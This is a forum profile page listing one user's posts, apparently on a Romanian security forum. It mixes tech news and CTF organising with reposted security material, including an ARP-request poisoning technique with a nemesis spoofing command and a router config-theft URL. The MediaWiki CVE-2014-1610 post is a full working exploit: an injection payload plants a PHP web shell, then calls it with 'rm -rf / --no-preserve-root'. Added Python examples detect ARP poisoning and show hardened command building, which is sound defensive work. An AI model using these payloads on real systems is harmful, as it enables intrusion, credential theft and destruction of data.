
Nytro

Administrators
Posts: 18736
Days Won: 711

Everything posted by Nytro

  1. Nytro

    Nemesis

    Nemesis is a command-line network packet crafting and injection utility for UNIX-like and Windows systems. Nemesis is well suited for testing Network Intrusion Detection Systems, firewalls, IP stacks and a variety of other tasks. As a command-line driven utility, Nemesis is perfect for automation and scripting. Nemesis can natively craft and inject ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP and UDP packets. Using the IP and the Ethernet injection modes, almost any custom packet can be crafted and injected.

    Author: Jeff Nathan <jeff@snort.org>
    Source code: nemesis-1.4.tar.gz (Build 26) (DSA sig)
    Windows binary: nemesis-1.4.zip (Build 26) (DSA sig) (includes LibnetNT)

    Source: nemesis.sourceforge.net - Packet injection tool suite
  2. A More Powerful, Stealthier and Uncommon ARP Poisoning Technique

     ARP poisoning is a well-known technique used to perform MITM (man-in-the-middle) or DoS (denial of service) attacks on a LAN. You might think that every security researcher and every hacker knows this technique inside out. After all, it is pretty simple. Send a spoofed ARP reply packet announcing "hey, you may or may not have asked for it, but I am X.X.X.X and my MAC address is YY:YY:YY:YY:YY:YY" and the target host receiving this packet will start sending traffic destined to X.X.X.X to whoever owns YY:YY:YY:YY:YY:YY on the LAN, typically a malicious host intercepting and/or modifying sensitive traffic. It is that simple. Or is it?

     A little-known variation of this classic poisoning attack is based on sending spoofed requests instead of replies. I am going to demonstrate that, contrary to what the current literature describes, poisoning with ARP requests is noticeably more powerful and robust. Amongst other things, not only does it work against all network stacks I tested (Windows 7 to 2000, Linux, OpenBSD, FreeBSD) but it also allows something that classic poisoning is unable to do: adding new ARP entries, in addition to overwriting existing ones.

     Description

     Let me start by quoting RFC 826, documenting ARP. It is not every day that one gets the opportunity to scrutinize a 30-year-old RFC:

         Packet Reception:

         When an address resolution packet is received, the receiving Ethernet module gives the packet to the Address Resolution module which goes through an algorithm similar to the following. Negative conditionals indicate an end of processing and a discarding of the packet.

         ?Do I have the hardware type in ar$hrd?
         Yes: (almost definitely)
           [optionally check the hardware length ar$hln]
           ?Do I speak the protocol in ar$pro?
           Yes:
             [optionally check the protocol length ar$pln]
             Merge_flag := false
             If the pair is already in my translation table, update the sender hardware address field of the entry with the new information in the packet and set Merge_flag to true.
             ?Am I the target protocol address?
             Yes:
               If Merge_flag is false, add the triplet to the translation table.
               ?Is the opcode ares_op$REQUEST? (NOW look at the opcode!!)
               [...]

         Notice that the triplet is merged into the table before the opcode is looked at. This is on the assumption that communcation is bidirectional; if A has some reason to talk to B, then B will probably have some reason to talk to A.

     The RFC describes that the sender IP and MAC addresses are added to the table before looking at the opcode indicating whether it is an ARP request or reply. In other words: ARP poisoning can be performed with ARP requests, in addition to ARP replies. Another consequence of this behavior is that it is possible to insert new entries in the ARP table, in addition to overwriting existing ones, something that is usually described as impossible.

     Example

     You might be wondering if modern network stacks really do implement ARP this way. The answer is yes. I have successfully exploited many different stacks in the past 10 years with this very technique. Namely:

       Windows 2000, XP, 2003, Vista, 2008, 7
       Linux kernel 2.4, 2.6
       OpenBSD 4.6 (also tested 2.x and 3.x back in the days)
       FreeBSD 4.x, 5.x (I have not tested newer versions but they are likely vulnerable as well)
       etc.

     It is interesting that RFC 826 documents the behavior pretty clearly, yet no ARP poisoning tool seems to purposefully exploit this fact. To be more correct, Ettercap is probably the only one (see the arp_poison_request setting), however even its implementation seems to be just a curiosity that has fallen into disuse, forgotten, and disabled by default (arp_poison_request=0 in etter.conf). As of May 10, 2010, before publishing this text, Googling "arp_poison_request" returned no results other than a few default etter.conf files accidentally indexed by the Googlebot. It is as if its developers realized it could work, but being unsure of its usefulness they disabled it by default and documented it as only "useful against targets that cache even arp request values". Not only did they not seem to realize it works against virtually any target, but more importantly I find no public mention of the multiple advantages of poisoning via ARP requests!

     Let me demonstrate the technique with the generic packet injection tool nemesis, which I am going to use to craft an ARP packet from scratch. To insert or overwrite the entry (10.2.44.90, 00:de:ad:be:ef:00) in the ARP table of the target (10.2.32.1, 00:30:48:xx:xx:xx), run this command from the attacker's machine:

         $ nemesis arp \
             -h 00:de:ad:be:ef:00 -S 10.2.44.90 \
             -m 0:0:0:0:0:0 -D 10.2.32.1 \
             -d eth0 -M 00:30:48:xx:xx:xx

     This will send the request "arp who-has 10.2.32.1 tell 10.2.44.90" while 10.2.44.90 pretends to have the MAC address 00:de:ad:be:ef:00. The Ethernet frame will have the destination MAC address 00:30:48:xx:xx:xx (to only poison this target instead of the whole broadcast domain), and will have the source MAC address of the attacker's eth0 NIC (which is 00:1f:e2:xx:xx:xx, but this is irrelevant). Here is a representation of the ARP request:

     [image: representation of the ARP request]

     Right before receiving the ARP request, the target does not know 10.2.44.90. The target in my example runs OpenBSD 4.6, so we can verify that it does not know about this IP with the arp command:

         $ arp -n 10.2.44.90
         10.2.44.90 (10.2.44.90) -- no entry

     After receiving the ARP request, it gets poisoned:

         $ arp -n 10.2.44.90
         ? (10.2.44.90) at 00:de:ad:be:ef:00 on bge0

     Notice how this is a new entry that was created. Classic ARP poisoning cannot create new entries like this.

     At this point, another very nice thing about this poisoning technique is that the target will of course send back an ARP reply to 00:de:ad:be:ef:00. If you are the attacker, you will get a confirmation of successful poisoning. How practical! Here is the ARP reply:

     [image: the ARP reply]

     A couple of remarks:

     An alternative version of the attack is that it can also work no matter what target IP address is used in the ARP request. In other words, in this example, if an "arp who-has x.x.x.x tell 10.2.44.90" was sent for any value of x.x.x.x, it would still poison, except that of course no ARP reply will be sent back because x.x.x.x is not an existent host. This alternative version works at least against Linux and OpenBSD. It does not work against Windows 7. I have not tested any other Unix or Windows version.

     In my example the ARP request packet had an Ethernet frame source MAC address of 00:1f:e2:xx:xx:xx which was different from the ARP sender MAC address 00:de:ad:be:ef:00. I made them different to demonstrate this is possible. But in practice they are often the same (i.e. an attacker would want to inject his MAC 00:1f:e2:xx:xx:xx in the table instead of 00:de:ad:be:ef:00). However, if the attacker really wants to inject 00:de:ad:be:ef:00, he may prefer to set the Ethernet frame source MAC address to 00:de:ad:be:ef:00 in order to match the ARP sender MAC address. This would be stealthier. With nemesis this can be done by adding -H 00:de:ad:be:ef:00.

     Advantages

     Poisoning with ARP requests is advantageous for at least 4 reasons.

     Firstly, it can be used to inject new entries in ARP tables, in addition to overwriting existing ones. Classic poisoning with ARP replies can only do the latter; the entry has to exist in the table already (even if marked "incomplete" in the output of the arp command) before it can be poisoned. Classic poisoning makes the attacker blind, as he does not know if the lack of intercepted network traffic is because an ARP entry was poisoned but there is no traffic, or because there was no ARP entry, which caused the poisoning attempt to be unsuccessful. Poisoning with ARP requests makes ARP poisoning more powerful.

     Secondly, the ARP reply sent back by the target is a nice side-effect that can be used by the attacker to get a positive validation of the success of ARP poisoning. It makes ARP poisoning more robust.

     Thirdly, the alternate version of the attack where an arbitrary x.x.x.x ARP target IP address is used in the ARP request makes it possible to poison many hosts on a LAN at once with a single ARP request packet that is naturally broadcast to the entire LAN (like the normal usage of ARP). With classic poisoning, one would have to either broadcast an ARP reply (replies are not expected to be broadcast, which may trigger IDS alerts, etc.), or send one ARP reply to every host that needs to be poisoned (the volume of ARP replies might also trigger alerts, etc.).

     Fourthly, no one seems to be very much aware of this ARP poisoning technique. Therefore the technique may be useful to evade detection, as no one expects it to be used. Tcpdump does not show the ARP sender MAC address (not to be confused with the Ethernet frame source MAC address), even in verbose mode (-vvv), so a human reading logs might miss ARP poisoning attempts. Intrusion Detection Systems analyzing network traffic might not inspect "obviously unmalicious" ARP requests.

     I hope my blog post will raise awareness of poisoning based on ARP requests!

     mrb, Monday 10 May 2010 at 02:25 am

     Source: A More Powerful, Stealthier and Uncommon ARP Poisoning Technique - Zorinaq
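     The post's last section says tcpdump hides the ARP sender MAC and that an IDS may not look at requests at all. As an added example (not part of mrb's post and not the nemesis tool), the Python below parses raw Ethernet/ARP frames and flags exactly the traits the post describes: an ARP sender MAC that differs from the Ethernet source MAC, a request sent unicast instead of broadcast, a broadcast reply, and an existing IP-to-MAC binding being replaced. The monitor keeps its own table and merges every packet before looking at the opcode, as RFC 826 prescribes, so the table mirrors what a victim's cache would do. The frames are constructed in memory from the post's addresses; the octets the post masks as xx are made up.

```python
"""Parse Ethernet/ARP frames and flag request-based ARP poisoning (example code)."""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class ArpFrame:
    eth_dst: str
    eth_src: str
    opcode: int
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def ip_bytes(s: str) -> bytes:
    return bytes(int(x) for x in s.split("."))


def build_arp(eth_dst, eth_src, opcode, sha, spa, tha, tpa) -> bytes:
    """Assemble an Ethernet+ARP frame in memory (used here only to construct test input)."""
    return (struct.pack("!6s6sH", mac_bytes(eth_dst), mac_bytes(eth_src), ETHERTYPE_ARP)
            + struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)  # hrd=Ethernet, pro=IPv4, hln=6, pln=4
            + mac_bytes(sha) + ip_bytes(spa) + mac_bytes(tha) + ip_bytes(tpa))


def parse_arp(frame: bytes) -> Optional[ArpFrame]:
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42:
        return None
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    hrd, pro, hln, pln, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (hrd, pro, hln, pln) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return ArpFrame(mac_str(eth_dst), mac_str(eth_src), opcode,
                    mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa))


def inspect(frame: bytes, table: Dict[str, str]) -> List[str]:
    """Check one frame against a monitor-side IP->MAC table and return alert strings.

    The table is merged before the opcode is considered, exactly as RFC 826
    prescribes, so it mirrors what a victim's ARP cache does with the same packet.
    """
    alerts: List[str] = []
    arp = parse_arp(frame)
    if arp is None:
        return alerts
    # tcpdump does not print the ARP sender MAC; comparing it with the frame source is the point.
    if arp.sender_mac != arp.eth_src:
        alerts.append(f"sender MAC {arp.sender_mac} differs from frame source {arp.eth_src}")
    if arp.opcode == ARP_REQUEST and arp.eth_dst != BROADCAST:
        alerts.append(f"unicast ARP request to {arp.eth_dst} (requests are normally broadcast)")
    if arp.opcode == ARP_REPLY and arp.eth_dst == BROADCAST:
        alerts.append("broadcast ARP reply")
    known = table.get(arp.sender_ip)
    if known is not None and known != arp.sender_mac:
        kind = "request" if arp.opcode == ARP_REQUEST else "reply"
        alerts.append(f"{arp.sender_ip} moved from {known} to {arp.sender_mac} via ARP {kind}")
    table[arp.sender_ip] = arp.sender_mac  # merge happens regardless of opcode (RFC 826)
    return alerts


# Constructed frames modelled on the post's example; the masked "xx" octets are made up.
POISON_REQUEST = build_arp("00:30:48:00:00:01", "00:1f:e2:00:00:02", ARP_REQUEST,
                           "00:de:ad:be:ef:00", "10.2.44.90", "00:00:00:00:00:00", "10.2.32.1")
NORMAL_REQUEST = build_arp(BROADCAST, "00:1f:e2:00:00:02", ARP_REQUEST,
                           "00:1f:e2:00:00:02", "10.2.44.91", "00:00:00:00:00:00", "10.2.32.1")

if __name__ == "__main__":
    cache: Dict[str, str] = {}
    for name, frame in (("normal", NORMAL_REQUEST), ("poison", POISON_REQUEST)):
        print(name, inspect(frame, cache) or ["no alerts"])
    print("resulting table:", cache)
```

     On a real link the frames would come from a raw socket or a pcap reader; everything after the parse is the same. The mismatch and unicast-request checks are the ones that matter here, because the "moved" check only fires if the monitor already knew the address, and the post's whole point is that the entry may not have existed before.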
  3. Halep won the Doha final against the German Kerber and claimed her first trophy of 2014: liveTEXT NOW Simona Halep - Angelique Kerber in the Doha final :: GSP.RO
  4. I know that most Romanians, and foreigners too, have a negative opinion of Romania. I would like us, at least, to see the good things as well and not forget them. I want us to put together here a list of positive things about Romania. I'll start with 2 examples from today: 1. Simona Halep qualified for the final of the Doha tennis tournament: Halep: I am very pleased with my performance, it was an incredible tournament - Mediafax 2. After the mathematics olympiad, Romanians are first in Europe and 10th in the world: Romania's brains rank first in Europe, 10th in the world after Math Olympiad | Romania-Insider.com I expect you to update this list as you notice that there are good sides to being Romanian, that there are people we can be proud of. I advise you to avoid mockery.
  5. All these topics are "Help" topics. You already have a category for that. When I see 2-3 articles posted by you on this subject, rather than problems of your own that you are waiting for someone to solve, I will consider this suggestion.
  6. Show me 5 posts each that you have made on this subject.
  7. Post the link.
  8. Quantum internet: the first teleportation of data into quantum storage over optical fibre. Published by Andrei Avădănei. A European team of physicists has demonstrated how a device can teleport quantum information to solid-state quantum (SSQ) storage over a telecom fibre, a capability crucial to the future of the quantum internet. What does quantum teleportation mean? Quantum teleportation is the ability to transmit something from one location to another without crossing the space between the two. The matter itself does not make the journey, only the information that describes it. This is transmitted to a new body that takes on the identity of the original. Full article: Quantum internet: the first teleportation of data into quantum storage over optical fibre | WORLDIT
  9. Samsung could record everything you do with your mobile phone and share the data with software developers. Aurelian Mihai - 11 Feb 2014. Future generations of Samsung tablets and phones could include a monitoring feature that records in great detail how Android devices are used. Identified by the name Context, the monitoring service resident in the memory of Samsung Android devices will permanently track how installed applications are used and the data supplied by the phone's sensors. Additionally, information about users' preferences will be collected by recording the words typed on the screen. Further, Samsung could make the collected information available to Android application developers, with the aim of helping them make improvements that better meet users' needs. Of course, the Context service will also play a role in increasing advertising revenue, by tailoring the ads displayed to users' interests. For example, after a search for cooking recipes we could be bombarded with ads for restaurants serving that dish ready-made. According to rumours, the introduction of the Context service has been temporarily postponed after closer analysis revealed fears about the negative effects the measure could have on sales of Samsung phones. Via: Theverge.com Source: Samsung could record everything you do with your mobile phone and share the data with software developers
  10. Via Andrei
  11. https://www.youtube.com/watch?v=fvxqnQmahTA
  12. Delete the Yahoo cookies and try again.
  13. I will take part both in developing the PHP script and in creating the challenges. I can't help with the design.
  14. Hi, Following a suggestion, I decided it would be a good idea to have our own CTF (Capture The Flag) portal. For those unfamiliar with the term, a CTF is a competition in which participants have to solve as many problems as possible and receive points according to their difficulty. The areas the problems can cover are very varied: hacking, steganography, cryptography, programming, algorithmics and many others. To develop this project we need people able to: 1. develop such problems (preferably people who have taken part in such competitions, and Hertz) 2. develop a well-structured, OOP PHP/MySQL script for managing users and challenges (with experience) 3. designers for this portal (Javascript/jQuery, CSS3, HTML5) Those who are able to contribute to this project are asked to send me a PM or post here. We would also like to offer prizes to those who finish in the top places at the end of the competition (a deadline). On this occasion, anyone able to donate money or various licences or services is asked to send me a PM. In a few days, depending on the number of people interested, we will get things moving. Send me a PM, or post here (preferably), if you can help.
  15. Don't complain that you got scammed if you have a ban. Minimum 50 posts for such deals.
  16. Where is the anonymity if the person you are talking to knows your IP?
  17. Yes, I know, RC4 has SOME problems, which is why I said whoever "breaks" it gets VIP. A pity it is hardly used anymore.
  18. RSA 4096 + AES 256 GCM. I trust RSA more than elliptic curves. How it works: 1. Client -> Server (handshake, validation of the server certificate, validation of the client certificate) 2. Server -> Client 2 (the same) 3. Client -> Client 2 (the server acts only as a router. A handshake is done and certificate checks are made on the clients) The server will have a CA against which its certificate will be verified. Each user will generate their own CA and, somehow, will give it to the user they want to communicate with. Certificate validation will be done against this certificate. ps-axl, what will you be working on? PS: Paid certificates signed by a root CA are an option. That way, a user who has a site, www.vasile.com, gets a certificate for that site and the certificate is later validated against the root CA that signed it. In this case, the root CA is public and "passing" it along is much simpler. PS2: I am waiting for whoever said SSL can be broken to give me a demo with RC4 with a 56-bit key and I'll be satisfied; they get VIP. If they give me a demo with AES 128 bit and RSA 1024 bit, they get Administrator.
  19. Nytro

    [rst] ctf

    Finally a good idea. Hertz, what do you think?
  20. Hacking and patching TP-LINK TD-W8901G router
     By piotrbania.com / 31.01.2014

     Motivation

     Recently a critical vulnerability has been found in TP-LINK routers and a few other router devices. The particular vulnerability to which I am referring was described here. Basically it is the so-called ROM-0 attack. In short, an attacker, by requesting ROM-0 through an HTTP request (i.e. http://192.168.1.1/ROM-0), can download all the important and secret data stored in your router. This includes your ADSL login/password combination, WIFI password and basically all of your configuration data. Actually I was a bit pissed at TP-LINK for this crap so I decided to patch the vulnerability by myself.

     DISCLAIMER: The author takes no responsibility for any actions taken with the provided information or code. You are doing everything on your own responsibility.

     The list of vulnerable devices is presented below:

       TD-W8901G
       TD-8816
       TD-W8951ND
       TD-W8961ND
       D-Link DSL-2640R ADSL Modem
       AirLive WT-2000ARM
       Pentagram Cerberus P 6331-42
       ZTE ZXV10 W300

     I had one of those devices (TD-W8901G) and I took this as a good fortune sign to start playing with hardware router hacking. My task was to patch this vulnerability and make the ROM-0 not downloadable. This was pretty much my first encounter with this type of stuff (and my first encounter with MIPS, really). At this point I would like to thank hackerfantastic and robercik for some hardware hints.

     Serial connection

     Most routers (or embedded devices in general) have some sort of communication port designed to aid the manufacturers with testing and debugging of the target device. This communication port is usually SERIAL (UART/RS232) or JTAG (EJTAG). In my case I was unable to find the JTAG (EJTAG) port but I found the serial port instead (presented in the images below). First of all, this is some ugly-ass soldering work (yes, I did that).

     OK, now getting back to my initial point: I used a PL2303 RS232<>USB converter to connect the serial port to the USB port of my computer. PuTTY is pretty decent for handling normal serial communication so I used it as my default client (configuration: 115200/8/1/N). I was expecting to see some output in my PuTTY but unfortunately I got nothing. So after some digging around and harassing a few friends (ohayo!) I found out that my voltage levels on the RX and TX pins were too low (they should be 3.3V). So after some further digging and looking at the schematics of this board it became obvious that two resistors are missing (see image above). So I took a piece of wire and connected the empty pins together (in two places, obviously). Now the voltage levels were correct and I was able to see the output in my terminal.

     Full article: PIOTRBANIA.COM :: Hacking and patching TP-LINK TD-W8901G router
  21. The registration marathon is now live!
     https://olympic-ctf.ru/register
  22. Mobile Pwn2Own Autumn 2013 Chrome on Android Exploit Writeup
     ianbeer@chromium.org

     tl;dr: Pinkie Pie exploited an integer overflow in V8 when allocating TypedArrays, abusing dlmalloc inline metadata and JIT rwx memory to get reliable code execution. Pinkie then exploited a bug in a Clipboard IPC message where a renderer-supplied pointer was freed to get code execution in the browser process by spraying multiple gigabytes of shared memory.

     Download: https://docs.google.com/document/d/1tHElG04AJR5OR2Ex-m_Jsmc8S5fAbRB3s4RmTG_PFnw/edit
  23. MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)

     From: Pichaya Morimoto <pichaya () ieee org>
     Date: Sat, 1 Feb 2014 22:28:51 +0700

     -----BEGIN PGP SIGNED MESSAGE-----
     Hash: SHA1

     ####################################################################
     #
     # MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
     # Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014)
     # Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
     # Affected website : Wikipedia.org and more !
     #
     # Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
     # Release dates : Feb 1, 2014
     # Special Thanks to 2600 Thailand !
     #
     ####################################################################

     # Exploit:
     ####################################################################
     1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
        http://vulnerable-site/index.php/Special:Upload
     2. inject os cmd to upload a php-backdoor
        http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 "<?php%20system(\\$_GET[1]);">https://rstforums.com/forum/images/xnz.php`
     3. access to php-backdoor!
        http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
     4. happy pwning!!

     # Related files:
     ####################################################################
     thumb.php                                   <-- extract all _GET array to params
     /extensions/PdfHandler/PdfHandler_body.php  <-- failed to escape w/width options
     /includes/media/ImageHandler.php
     /includes/GlobalFunctions.php
     includes/filerepo/file/File.php

     # Vulnerability Analysis:
     ####################################################################
     1. thumb.php
        This script is used to resize images if it is configured to be done when the web browser requests the image.

        <?
        ...
        // 1.1 Called directly, use $_GET params
        wfThumbHandleRequest();

        // 1.2 Handle a thumbnail request via query parameters
        function wfThumbHandleRequest() {
            $params = get_magic_quotes_gpc() ? array_map( 'stripslashes', $_GET ) : $_GET;
            wfStreamThumb( $params ); // stream the thumbnail
        }

        // 1.3 Stream a thumbnail specified by parameters
        function wfStreamThumb( array $params ) {
            ...
            $fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts uploaded.pdf file here
            ...
            // Backwards compatibility parameters
            if ( isset( $params['w'] ) ) {
                $params['width'] = $params['w']; // << Inject os cmd here!
                unset( $params['w'] );
            }
            ...
            $img = wfLocalFile( $fileName );
            ...
            // Thumbnail isn't already there, so create the new thumbnail...
            $thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image by width/height
            ...
            // Stream the file if there were no errors
            $thumb->streamFile( $headers );
            ...
        ?>

     2. /includes/filerepo/file/File.php

        <?
        ...
        function transform( $params, $flags = 0 ) {
            ...
            $handler = $this->getHandler(); // << PDF Handler
            ...
            $normalisedParams = $params;
            $handler->normaliseParams( $this, $normalisedParams );
            ...
            $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
            ..
        ?>

     3. /extensions/PdfHandler/PdfHandler_body.php

        <?
        ...
        function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {
            ...
            $width = $params['width'];
            ...
            $cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & parameters
            $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} -dLastPage={$page}";
            $cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg( $srcPath );
            $cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor );
            $cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell argument
            $cmd .= wfEscapeShellArg( $dstPath ) . ")";
            $cmd .= " 2>&1";
            ...
            $err = wfShellExec( $cmd, $retval );
            ...
        ?>

     4. /includes/GlobalFunctions.php
        Execute a shell command, with time and memory limits

        <?
        ...
        function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = array() ) {
            ...
            passthru( $cmd, $retval ); // << Execute here!!

     # POC:
     ####################################################################
        GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\$_GET[1]);%22%3Eimages/longcat.php` HTTP/1.1
        Host: 127.0.0.1
        Connection: keep-alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Encoding: gzip,deflate,sdch
        Accept-Language: en-US,en;q=0.8
        Cookie: my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=op3h2huvddnmg7gji0pscfsg02

        <html><head><title>Error generating thumbnail</title></head>
        <body>
        <h1>Error generating thumbnail</h1>
        <p>
        ?????????????????????????????: /bin/bash: -: command not found<br />
        convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380.<br />
        GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />
        </p>
        </body>
        </html>

        GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
        Host: 127.0.0.1
        Connection: keep-alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Encoding: gzip,deflate,sdch
        Accept-Language: en-US,en;q=0.8
        Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1

        uid=33(www-data) gid=33(www-data) groups=33(www-data)

     # Back-end $cmd
     ####################################################################
     GlobalFunctions.php : wfShellExec()
        cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | '/usr/bin/convert' -depth 8 -resize 10|`echo "<?php system(\\$_GET[1]);">images/longcat.php` - '/tmp/transform_0e377aad0e27-1.jpg') 2>&1

     Source: Full Disclosure: MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
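     The analysis above pins the bug to one line of doTransform(): every other argument goes through wfEscapeShellArg(), but {$width} is interpolated raw, so a value such as 10|... turns the convert argument into a second pipeline stage. As an added example (not MediaWiki's code and not from the advisory), the Python below re-creates the same command construction with shlex.quote standing in for wfEscapeShellArg, shows the vulnerable builder beside a hardened one that validates the width as a small positive integer and quotes it anyway, and adds the check a defender would run over web-server logs: flag thumb.php requests whose w/width/h/height values are not plain integers. The gs, convert and DPI values are assumed stand-ins for $wgPdfProcessor, $wgPdfPostProcessor and $wgPdfHandlerDpi; the log lines are constructed and the injected value in them is a harmless placeholder rather than the advisory's payload.

```python
"""Shell-argument injection as in PdfHandler doTransform(), re-created in Python (example code)."""
import re
import shlex
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Assumed stand-ins for $wgPdfProcessor, $wgPdfPostProcessor and $wgPdfHandlerDpi.
PDF_PROCESSOR = "gs"
PDF_POST_PROCESSOR = "/usr/bin/convert"
PDF_DPI = 150


def _pipeline(width_arg: str, src_path: str, dst_path: str, page: int) -> str:
    """Same command shape as the PHP: gs renders one page, convert resizes it."""
    cmd = "(" + shlex.quote(PDF_PROCESSOR)
    cmd += f" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={page} -dLastPage={page}"
    cmd += f" -r{PDF_DPI} -dBATCH -dNOPAUSE -q " + shlex.quote(src_path)
    cmd += " | " + shlex.quote(PDF_POST_PROCESSOR)
    cmd += f" -depth 8 -resize {width_arg} - "   # the only argument the caller controls
    cmd += shlex.quote(dst_path) + ")"
    return cmd + " 2>&1"


def build_cmd_vulnerable(width, src_path: str, dst_path: str, page: int = 1) -> str:
    """Mirrors the bug: the width taken from ?w= is interpolated unquoted."""
    return _pipeline(str(width), src_path, dst_path, page)


def width_is_valid(width) -> bool:
    """Accept only a positive integer of at most five digits (no sign, no whitespace)."""
    return re.fullmatch(r"[1-9][0-9]{0,4}", str(width)) is not None


def build_cmd_hardened(width, src_path: str, dst_path: str, page: int = 1) -> str:
    """Reject anything that is not a small positive integer, then quote it anyway."""
    if not width_is_valid(width):
        raise ValueError(f"invalid width: {str(width)!r}")
    return _pipeline(shlex.quote(str(width)), src_path, dst_path, page)


SIZE_PARAMS = ("w", "width", "h", "height")


def suspicious_thumb_requests(log_lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, parameter, value) for thumb.php requests with non-integer sizes."""
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/thumb.php"):
            continue
        # parse_qs percent-decodes, so %7C%60 come back as the literal | and ` characters
        for key, values in parse_qs(url.query, keep_blank_values=True).items():
            if key in SIZE_PARAMS:
                for value in values:
                    if not re.fullmatch(r"[0-9]+", value):
                        hits.append((lineno, key, value))
    return hits


# Constructed access-log lines; the second carries a harmless stand-in for the real payload.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Feb/2014:22:28:51 +0700] "GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10 HTTP/1.1" 200 5120',
    '127.0.0.1 - - [01/Feb/2014:22:29:03 +0700] "GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10%7C%60id%60 HTTP/1.1" 500 412',
    '127.0.0.1 - - [01/Feb/2014:22:29:10 +0700] "GET /mediawiki1221/index.php/Main_Page HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    print(build_cmd_vulnerable("10|`id`", "/tmp/in.pdf", "/tmp/out.jpg"))
    print(build_cmd_hardened(10, "/tmp/in.pdf", "/tmp/out.jpg"))
    print(suspicious_thumb_requests(SAMPLE_LOG))
```

     The validation step is the real fix; quoting alone would stop the injection but still pass junk to convert. The log check is cheap to run retroactively, since the request line in a normal access log is enough to spot a size parameter that could never have come from a legitimate thumbnail link.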
  24. MS Word 2013 Reading Locations

     Microsoft Office 2013 introduced a new feature that allows a user to continue reading or editing a document starting at the last point he or she was working. This feature, referred to by some as "pick up where you left off", is a convenient way to jump to the location within a document that Word believes was being read or edited most recently before a file was closed. After opening a document and being greeted with the prompt pictured above, I was curious as to where this information is being tracked. After a bit of investigation, I located a set of registry subkeys specific to Office 2013 where this information is stored.

     When a document in Word 2013 is closed, a registry subkey is created or updated in the "Software\Microsoft\Office\15.0\Word\Reading Locations" subkey of the current user's NTUSER.DAT. The subkey created should be named something similar to "Document 0", "Document 1", "Document 2", etc., as the number appended to the name of each subkey is incremented by one when a new document is closed. Each "Document #" subkey should contain 3 values that may be of interest to an examiner: "Datetime", "File Path", and "Position". All three values are stored as null-terminated Unicode strings.

     [image: Screenshot of Reading Locations Subkey]

     Datetime Value

     The Datetime value corresponds to the local date and time the file was last closed. This value data is displayed in the format YYYY-MM-DD, followed by a "T", then HH:MM.

     File Path Value

     The File Path value is the fully qualified file name.

     Position Value

     The Position value appears to store the positioning data used to place the cursor at the point in the document "where you left off". It appears that the second number in this value data is used to denote the location within the document. For example, if a file is opened for the first time and then closed again without scrolling down through the document, the Position value data should be "0 0". If a file is opened and the user scrolls down a bit through the document before closing it, the Position value data may be something like "0 1500". The second number in this value data appears to increase as the user scrolls through (i.e. reads/edits) the document. Note that positioning of the cursor does not seem to have an impact on this value. That is, the second field in this value data increases even if the cursor is never moved from the beginning of the document.

     Forensic Implications

